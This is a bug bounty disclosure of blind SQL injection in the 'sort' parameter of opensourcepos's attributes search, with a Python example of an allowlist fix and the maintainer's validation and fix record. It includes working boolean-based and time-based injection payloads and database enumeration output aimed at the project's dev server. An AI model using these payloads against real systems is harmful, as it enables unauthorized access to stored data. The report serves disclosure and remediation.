SQL Injection in opensourcepos/opensourcepos

Reported on Aug 26th 2021

✍️ Description

The application is vulnerable to blind SQL injection through the sort parameter of the attributes search endpoint.

🕵️‍♂️ Proof of Concept

URL: https://dev.opensourcepos.org/attributes/search?sort=1
Vulnerable Parameter: sort

Parameter: sort (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: sort=(SELECT (CASE WHEN (5937=5937) THEN 1 ELSE (SELECT 4996 UNION SELECT 4231) END))

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sort=1 AND (SELECT 3335 FROM (SELECT(SLEEP(5)))uafX)

available databases [2]:
[*] information_schema
[*] ospos

💥 Impact

SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands. A successful SQL injection attack can result in unauthorized access to sensitive data, such as (hashed) passwords, credit card details, or personal user information.
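The bug class above, illustrated from the defender's side as an added example that is not the opensourcepos project's own code: a sort index taken from the query string cannot be passed as a bound parameter, because ORDER BY does not accept placeholders, so the only safe option is to map it onto an allowlisted column. The table, rows and sort mapping below are constructed for the demonstration and do not reflect the application's real schema.

```python
import sqlite3

# Constructed stand-in for an attributes table; not the application's schema.
SCHEMA = "CREATE TABLE attributes (id INTEGER PRIMARY KEY, name TEXT, sort_order INTEGER)"
ROWS = [(1, "color", 2), (2, "size", 1), (3, "weight", 3)]

# Hypothetical allowlist: the client-supplied sort index selects a fixed
# column/direction pair. Anything not in this dict is rejected outright.
SORT_COLUMNS = {
    "1": ("name", "ASC"),
    "2": ("name", "DESC"),
    "3": ("sort_order", "ASC"),
}


def build_query_vulnerable(sort: str) -> str:
    """The anti-pattern behind the report: untrusted input spliced into ORDER BY.
    Anything the client sends becomes part of the statement text."""
    return f"SELECT id, name FROM attributes ORDER BY {sort}"


def sort_is_allowed(sort: str) -> bool:
    """Exact-match check against the allowlist; no normalisation or partial matching."""
    return sort in SORT_COLUMNS


def build_query_safe(sort: str) -> str:
    """Hardened form: only allowlisted column/direction pairs reach the SQL text."""
    if not sort_is_allowed(sort):
        raise ValueError(f"rejected sort parameter: {sort!r}")
    column, direction = SORT_COLUMNS[sort]
    return f"SELECT id, name FROM attributes ORDER BY {column} {direction}"


def run(sql: str) -> list:
    """Execute a query against an in-memory copy of the sample table and
    return the attribute names in result order."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO attributes VALUES (?, ?, ?)", ROWS)
    return [row[1] for row in conn.execute(sql)]


if __name__ == "__main__":
    payload = "1 AND (SELECT 3335 FROM (SELECT(SLEEP(5)))uafX)"  # from the report
    print(build_query_vulnerable(payload))  # payload lands verbatim in the SQL
    print(run(build_query_safe("1")))       # allowlisted value works normally
    print(sort_is_allowed(payload))         # False: the hardened path rejects it
```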

2 years ago

Hey Melbin, I've just emailed the repo maintainer about this report.

We have contacted a member of the opensourcepos team and are waiting to hear back 2 years ago
opensourcepos/opensourcepos maintainer validated this vulnerability 2 years ago
Melbin Mathew Antony has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos marked this as fixed with commit b4c48e 2 years ago
jekkos has been awarded the fix bounty
This vulnerability will not receive a CVE